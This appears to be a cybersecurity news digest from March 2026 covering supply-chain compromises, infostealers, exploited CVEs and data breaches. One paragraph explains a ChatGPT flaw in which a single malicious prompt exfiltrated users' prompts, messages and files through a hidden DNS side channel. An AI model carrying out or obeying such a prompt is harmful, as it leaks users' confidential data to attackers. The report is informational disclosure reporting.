The TeamPCP threat group has expanded its supply chain campaign from credential theft and worm propagation to monetization via partnerships with extortion groups, including Lapsus$ and the Vect ransomware operation. Research from Wiz (Google Cloud) confirms TeamPCP is validating, encrypting, and exfiltrating stolen cloud and Kubernetes secrets to attacker infrastructure, while explicitly collaborating with Lapsus$ to perpetuate follow-on attacks. Cisco disclosed a breach of its internal development environment directly linked to the Trivy supply chain attack, where attackers leveraged a malicious GitHub Action to steal credentials and source code from dozens of devices. The incident resulted in the cloning of over 300 repositories, including proprietary AI product code and code belonging to corporate customers such as banks, BPOs, and US government agencies. Attackers also stole and abused AWS keys to conduct unauthorized activities in a subset of Cisco’s cloud accounts. Cisco has isolated systems, reimaged devices, and is rotating credentials widely, with multiple threat actors observed participating in the breach. Security researchers describe this as a 'dangerous convergence' between supply chain attackers and extortion gangs, creating a 'snowball effect' that requires immediate security action across cloud-native environments. The campaign now spans CI/CD pipelines (Trivy, Checkmarx KICS), container registries (Aqua Security Docker Hub images), LLM integration tools (LiteLLM), and now includes monetization through ransomware and extortion, as well as direct enterprise compromises such as the Cisco breach. Key milestones include the initial Trivy compromise on March 19, 2026, the deployment of CanisterWorm and wiper attacks over March 21–22, 2026, the expansion to LiteLLM, and the recent monetization phase targeting affected organizations for follow-on extortion, ransomware attacks, and enterprise breaches like the Cisco incident.

Mid-market security teams increasingly rely on CVE-based vulnerability tracking, but experts warn this approach creates critical blind spots in real-world exposure management. Exploitation timelines have collapsed from months to hours, with potential for minutes or even seconds, escalating risk for organizations unable to patch within 30 days. Traditional CVE-only strategies overlook critical exposures such as misconfigured databases, exposed management interfaces, and overlooked attack surface elements despite patch deployments, leaving fully patched environments vulnerable to compromise.

Organizations are increasingly prioritizing data integrity and trustworthiness as core cybersecurity concerns, driven by AI-driven decision-making systems that rely on accurate, uncompromised inputs. Data distortion—whether intentional manipulation or unintentional corruption—poses a critical operational risk, as even minor alterations in training or operational datasets can produce inaccurate or harmful outputs. The reliance on data across financial, operational, and strategic domains amplifies the impact of compromised information, transforming data integrity from a technical issue into a strategic leadership challenge. The shift reflects a recognition that modern threats target not only systems but also the data inputs these systems consume, necessitating a proactive approach to understanding data flows, sources, and transformations to prevent silent corruption. Without robust governance and continuous validation, compromised data can blend into normal operational patterns, evading detection and undermining downstream processes, particularly those driven by AI models.

The rapid adoption of AI agents is shifting enterprise machine-to-human identity ratios from 100:1 to projections of 1,000:1, necessitating a fundamental re-evaluation of digital trust mechanisms. Digital certificate lifespans are decreasing, increasing the operational complexity of identity lifecycle management and raising the risk of outages without automated trust infrastructure. Trust assumptions are eroding due to deepfake-enabled phishing and autonomous agents performing actions on behalf of users, necessitating cryptographic validation of content, identity, and actions.

A newly identified infostealer malware kit named Venom Stealer is offered as a malware-as-a-service (MaaS) subscription priced at $250 per month or $1,800 lifetime, enabling continuous credential harvesting and wallet cracking operations. The kit targets Windows systems via deceptive social engineering lures hosted on custom Cloudflare DNS domains, bypassing browser encryption for Chrome v10/v20 passwords without triggering User Account Control (UAC) prompts. Upon execution, it extracts and exfiltrates browser credentials, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from Chromium and Firefox browsers. Venom Stealer distinguishes itself by maintaining silent persistence through a background session listener that reports new credentials and wallet activity to command-and-control infrastructure twice daily, undermining password rotation and incident response efforts.

Enterprises are transitioning from AI chatbots to AI agents capable of autonomous reasoning, planning, and action across systems. These agents introduce new security risks driven by access scope and operational autonomy. Three primary categories of AI agents—agentic chatbots, local agents, and production agents—each present distinct identity and governance challenges. CISOs must prioritize visibility into agent identities, permissions, and interactions to mitigate exposure of sensitive data, unauthorized system modifications, and prompt injection risks. The shift underscores AI agents as first-class identities within enterprise environments, requiring identity governance frameworks to align permissions with intended agent functionality and reduce attack surfaces.

Iran has reactivated the state-backed Pay2Key ransomware operation, recruiting affiliates from Russian cybercrime forums to conduct pseudo-ransomware attacks against high-impact US targets as part of its ongoing geopolitical conflict with the US and Israel. The campaign blends destructive wiper malware (e.g., Apostle retrofitted as ransomware) with extortion schemes to obscure geopolitical motives, complicate attribution, and maximize disruptive and financial impact. Affiliates receive profit-sharing incentives (up to 80% payouts) for attacks aligning with Iranian state objectives, effectively outsourcing cyber retribution to the global cybercrime ecosystem.

A security flaw in ChatGPT allowed attackers to exfiltrate sensitive user data—including prompts, messages, and uploaded files—through a single malicious prompt and DNS side channel. The issue stemmed from a hidden outbound communication path in ChatGPT’s isolated runtime environment, enabling covert transmission of data to external servers. Exploitation did not require complex attack chains; attackers could trick users into pasting malicious prompts via social engineering. OpenAI deployed a patch on February 20 after receiving a responsible disclosure from Check Point researchers. The scope of potential exposure included corporate credentials, personal health records, and other sensitive information processed by ChatGPT users.

A faulty software update in Lloyds Banking Group’s mobile banking platform caused a five-hour window on March 12, 2026 during which transaction details from current accounts were briefly exposed to other users accessing their transaction lists within similar timeframes. The incident affected 447,936 mobile banking users, with 114,182 potentially viewing sensitive payment details such as sort codes, account numbers, National Insurance numbers, and vehicle registrations. Balances remained unaffected and no unauthorized transactions were possible. Lloyds attributed the issue to a glitch in a software update deployed at 03:28 UTC and resolved at 08:08 UTC, with no recurrence reported.

The UK Information Commissioner’s Office (ICO) received 3,872 employee data breach reports in 2025, the highest annual total in at least seven years, representing a 5% increase year-over-year and a 29% rise since 2019. Non-cyber breach incidents surged by 15% to 2,304, while cyber-related breaches declined by 6% to 1,568, highlighting persistent vulnerabilities tied to hybrid work environments. Sensitive employee information—including HR records, payroll data, disciplinary files, medical records, and identity documents—is increasingly exposed through physical and procedural failures rather than technical compromises. Employers face escalating liability risks as employees retain rights to claim stress or anxiety damages from accidental breaches, intensifying the need for coordinated HR-security governance and practical training aligned with hybrid work realities.

A 36-year-old Maryland man was charged for orchestrating two smart contract heists against the Uranium Finance decentralized exchange (DEX) in April 2021, stealing approximately $53.3 million in cryptocurrency. The suspect, Jonathan Spalletta (aka "Cthulhon"), exploited code flaws in Uranium's automated market maker (AMM) contracts, forcing the exchange into insolvency. Proceeds were laundered through Tornado Cash and partially spent on high-value collectibles. The first breach on April 8, 2021, involved manipulating the AmountWithBonus variable to issue unauthorized zero-token withdrawals, draining about $1.4 million, which he partially extorted back as a sham bug bounty. The second attack on April 28, 2021, exploited a single-character error in transaction-verification logic, allowing him to withdraw 90% of the DEX's assets across 26 liquidity pools while depositing negligible value.

CVE-2025-53521, initially disclosed as a DoS flaw in October 2025, has been reclassified as a critical RCE vulnerability (CVSS 9.8) following new exploitation activity in March 2026. Threat actors are actively exploiting the flaw by sending malicious traffic to virtual servers configured with BIG-IP AMP or systems in appliance mode to deploy webshells and other payloads. F5 has confirmed exploitation in the wild and published IOCs, while CISA added the flaw to its KEV catalog on March 28, 2026, mandating federal remediation within three days. Multiple actors are probing F5 infrastructure, with observed payload deviations and scanning targeting REST API endpoints. Shadowserver tracks over 240,000 exposed BIG-IP instances, and the NCSC has urged immediate patching in the UK due to confirmed exploitation activity. The flaw affects BIG-IP APM versions 15.1.0–15.1.10, 16.1.0–16.1.6, 17.1.0–17.1.2, and 17.5.0–17.5.1. Fixed versions (15.1.10.8, 16.1.6.1, 17.1.3, 17.5.1.3) are available, and F5 recommends forensic best practices including system rebuilding due to potential persistent malware in UCS backups.

The Dutch Ministry of Finance disclosed a cybersecurity incident involving unauthorized access to systems within its policy department, initially detected on March 19, 2026. On March 23, 2026, the ministry took several systems offline—including the treasury banking portal—for forensic investigation, disrupting access for approximately 1,600 public institutions. Core treasury functions retained full access to funds, and payments continued via regular banking channels. The breach affected some employees but did not impact core financial operations such as tax collection or benefits administration. The investigation, supported by the National Cyber Security Center (NCSC), external forensic experts, and Dutch authorities, remains ongoing. No threat actor has claimed responsibility, and no confirmation of data exfiltration has been provided.

A critical out-of-bounds read vulnerability in Citrix NetScaler ADC and NetScaler Gateway, tracked as CVE-2026-3055, is being actively exploited in the wild to leak sensitive information and extract administrative session IDs from appliance memory, enabling potential full appliance takeover. Citrix disclosed the flaw on March 23, 2026, alongside a high-severity race condition flaw, affecting versions before 14.1-60.58, 13.1-62.23, and those older than 13.1-37.262. The vulnerability requires appliances to be configured as SAML Identity Providers and impacts only customer-managed systems. Exploitation was confirmed via honeypot networks on March 27, with attackers leveraging both /saml/login and /wsfed/passive endpoints to trigger memory overread conditions. Security researchers criticize Citrix’s disclosure as incomplete and provide tools to detect vulnerable hosts. On March 30, 2026, CISA added CVE-2026-3055 to its Known Exploited Vulnerabilities (KEV) Catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to patch vulnerable Citrix appliances by April 2, 2026 under BOD 22-01. CISA warned the flaw poses significant risks to the federal enterprise and urged all organizations to prioritize patching. Shadowserver reports nearly 30,000 exposed NetScaler ADC appliances and over 2,300 exposed Gateway instances online.

A healthcare IT provider, CareCloud Health, experienced a cyber intrusion on March 16, 2026, resulting in an eight-hour network disruption and unauthorized access to one of six electronic health record (EHR) environments containing patient data. The incident was detected the same day, contained the same evening, and involved a single SaaS-based EHR environment among CareCloud’s six production environments. Investigation is ongoing to determine the scope of data access and potential exfiltration. The attacker’s access was removed, all systems were restored, and external cybersecurity experts are assisting in remediation and hardening efforts. No public ransomware group has claimed responsibility for the intrusion at this time.

A malicious campaign named DeepLoad is actively targeting enterprise networks to steal user credentials and maintain persistent access. The malware combines social engineering via ClickFix to trick users into executing PowerShell commands through the Windows Run dialog, leveraging compromised websites or SEO-poisoned search results for delivery. DeepLoad hides its functional payload within layers of AI-generated obfuscation code within meaningless variable assignments, evading file-based detection. It leverages Windows lock screen processes via 'LockAppHost.exe' and abuses Windows Management Instrumentation (WMI) to achieve persistence, automatically re-infecting systems three days after initial removal without additional user or attacker action. The campaign spreads via USB drives within minutes of infection, deploying decoy shortcut files such as 'ChromeSetup.lnk' and 'Firefox Installer.lnk' to enable lateral movement. DeepLoad deploys a standalone credential stealer ('filemanager.exe') that exfiltrates stored browser passwords and a malicious browser extension to intercept real-time keystrokes during login sessions. Impact includes unauthorized access to enterprise accounts, potential data exfiltration, and sustained foothold in compromised networks despite apparent cleanup efforts.

A recently identified Node.js-based malware implant named RoadK1ll is being used by threat actors to establish covert tunnels via WebSocket for lateral movement within compromised networks. The implant operates as a lightweight reverse tunneling tool that converts a single infected host into a relay node, enabling attackers to bypass perimeter controls and access internal systems not directly exposed. It establishes an outbound WebSocket connection to attacker-controlled infrastructure to relay TCP traffic on demand, avoiding the need for inbound listeners that could trigger detection. The tool supports concurrent connections, command execution, and automatic reconnection, facilitating persistent, low-noise access without traditional persistence mechanisms. Researchers link observed use of RoadK1ll to recent incident response engagements, highlighting its role in extending attacker dwell time and enabling pivoting to sensitive network segments.

Cybercriminals have launched over a hundred tax-themed phishing campaigns in early 2026, employing malware, remote access tools, fraud schemes, and credential harvesting. Threat actors are increasingly integrating remote monitoring and management (RMM) tools into their operations to maintain persistence and escalate intrusions. These campaigns leverage seasonally relevant lures tied to tax filing pressures, including fake investment firm requests for updated W-8BEN forms and business email compromise (BEC) attempts targeting employees for W-2/W-9 forms. The tactics exploit urgency around penalties, missing documents, and compliance, resulting in credential theft and exposure of sensitive financial and personal data.

In March 2026, Apple introduced a Terminal security feature in macOS Tahoe 26.4 that blocks execution of pasted commands and warns users of potential risks, directly targeting ClickFix-style social engineering attacks used to distribute malware such as Shamos and MacSync. Since June 2025, the COOKIE SPIDER group’s Shamos infostealer has targeted Mac devices via ClickFix attacks, stealing data and credentials from browsers, Keychain, Apple Notes, and cryptocurrency wallets. Early variants relied on malvertising and fake GitHub repositories to trick users into executing shell commands, while later MacSync variants used digitally signed, notarized Swift applications to bypass Gatekeeper checks. Recent campaigns have leveraged legitimate platforms like Cloudflare Pages and Squarespace to host malicious installers, with ClickFix evolving to require minimal user pretexts.

Gartner has published a structured evaluation framework for AI-driven Security Operations Center (SOC) agents, highlighting significant gaps between adoption rates and measurable improvements. The framework aims to help cybersecurity leaders assess vendor claims, integration complexity, autonomy boundaries, and long-term vendor viability before deployment. The report warns that while 70% of large SOCs are expected to pilot AI agents by 2028, only 15% will achieve measurable improvements without structured evaluation. Gartner’s framework emphasizes outcomes-driven metrics, analyst augmentation, transparency, and integration depth as critical evaluation criteria.

A transient software defect in a system update for Lloyds Banking Group’s mobile banking platform enabled temporary exposure of customer personal and transactional data to other users. The incident occurred during an overnight update on 12 March and affected customers of Lloyds, Halifax and Bank of Scotland, where brief overlapping app sessions allowed some users to view unrelated transactions, account details, payment references, and national insurance numbers. No evidence of subsequent financial fraud or data misuse has been reported, but 3,625 customers received compensation totalling £139,000.

Microsoft has paused the rollout of Windows 11 non-security preview update KB5079391 (OS build 26100.2484) due to widespread installation failures marked by error code 0x80073712, affecting systems running Windows 11 24H2 and 25H2. The update included 29 changes such as Smart App Control improvements, Display enhancements, Windows Hello Fingerprint reliability fixes, and Windows Recovery Environment (Windows RE) stability updates for x64 apps on ARM64 devices. Installation errors manifest with the message: "Some update files are missing or have problems. We'll try to download the update again later. Error code: (0x80073712)."

A UK-based monitored alarm provider, TMAC, was fined £100,000 by the Information Commissioner’s Office (ICO) for making 260,000 nuisance calls to numbers registered on the Telephone Preference Service (TPS). The calls, made between February and September 2024, deliberately targeted individuals over 60 using predatory tactics, including impersonating local crime and fire prevention initiatives to deceive recipients. Callers concealed their true identities and failed to comply with UK telemarketing regulations under PECR.

The European Commission has confirmed a second breach affecting its Amazon cloud infrastructure, which hosted its Europa.eu platform, occurring on March 24, 2026. A threat actor, identified as ShinyHunters, claims to have stolen over 350GB of data, including databases, confidential documents, employee PII, DKIM keys, internal admin URLs, NextCloud data, and military financing data. The attacker stated no intention to extort the Commission but warned of potential secondary impacts such as identity risk and spear-phishing attacks. The breach was contained within hours, and the Commission is notifying affected entities while investigating the full impact. This follows the January 30, 2026 breach of the Commission’s mobile device management platform, linked to Ivanti EPMM vulnerabilities, which exposed staff names, phone numbers, and business email addresses and was contained within 9 hours.

Fortinet’s **critical SQL injection vulnerability (CVE-2026-21643, CVSS 9.1)** in FortiClientEMS is now being actively exploited in attacks, according to threat intelligence reports. The flaw allows unauthenticated attackers to execute arbitrary code via crafted HTTP requests targeting the 'Site' header in the web interface. Nearly **1,000 exposed FortiClient EMS instances** remain vulnerable online, with the majority located in the U.S. and Europe. This follows Fortinet’s recent emergency patches for **CVE-2026-24858**, a critical FortiCloud SSO authentication bypass (CVSS 9.4) that was exploited to create admin accounts, modify firewall configurations, and exfiltrate data from over 25,000 exposed devices. CISA has mandated patches for federal agencies, but CVE-2026-21643 remains unlisted in its KEV catalog despite confirmed exploitation. The vulnerabilities stem from improper input validation—SQL injection in FortiClientEMS and authentication bypass in FortiCloud SSO—and have been linked to automated attacks since January 2026. Fortinet advises disabling FortiCloud SSO until patches are applied, restricting management interface access, and treating compromised systems as fully breached, requiring credential rotation and configuration restoration from clean backups. Patches for CVE-2026-24858 are available in **FortiOS 7.4.11**, **FortiManager 7.4.10**, and **FortiAnalyzer 7.4.10**, while CVE-2026-21643 is fixed in **FortiClientEMS 7.4.5** (versions 7.2 and 8.0 are unaffected).

A coordinated cyber operation attributed to three China-linked clusters targeted a Southeast Asian government organization between March and September 2025. The campaign deployed a suite of malware families including HIUPAN (USBFect), PUBLOAD, EggStremeFuel/Loader, MASOL RAT, PoshRAT, TrackBak Stealer, Hypnosis Loader, and FluffyGh0st via complex infection chains. The activity indicates persistent access was the primary objective, leveraging overlapping TTPs across Mustang Panda (June–August), CL-STA-1048 (March–September, overlapping Earth Estries/Crimson Palace), and CL-STA-1049 (April & August, overlapping Unfading Sea Haze).

A missing capability check in the Smart Slider 3 WordPress plugin allows authenticated users, including subscribers, to read arbitrary files on the server. This flaw affects over 800,000 active installations and enables access to sensitive files such as wp-config.php, exposing database credentials, cryptographic keys, and salts. The vulnerability, tracked as CVE-2026-3098, was patched in version 3.5.1.34 on March 24, 2026, but approximately 500,000 sites remain unpatched and at risk of user data theft or full site compromise.

The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.

A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, and exfiltrates data via HTTP POST to C2 with Telegram notifications to operators.

Apple has begun sending Lock Screen notifications to iPhones and iPads running outdated iOS versions warning users of active web-based exploits and urging immediate updates. This follows Apple’s support document alerting users to exploit kits like Coruna (targeting iOS 13–18.7) and Darksword (targeting iOS 18.4–18.7) and the public leak of a newer Darksword version on GitHub. Coruna and Darksword are now independently confirmed as closely related frameworks with shared origins in the 2019–2023 Operation Triangulation campaign, reinforcing attribution to Russian threat actor UNC6353 and associated groups. Coruna has evolved from a precision espionage tool into a mass-exploitation framework with 23 exploits across five chains, while Darksword is now publicly leaked and targets iOS 18.7. Apple has patched all exploited flaws in recent releases (18.7.3, 26.2, 26.3.1), and CISA has mandated federal agencies patch three DarkSword-linked vulnerabilities (CVE-2025-31277, CVE-2025-43510, CVE-2025-43520) by April 3, 2026. Campaigns linked to UNC6353, UNC6748, and Turkish vendor PARS Defense highlight the growing commoditization of iOS exploitation tools and elevated risk to end-users globally.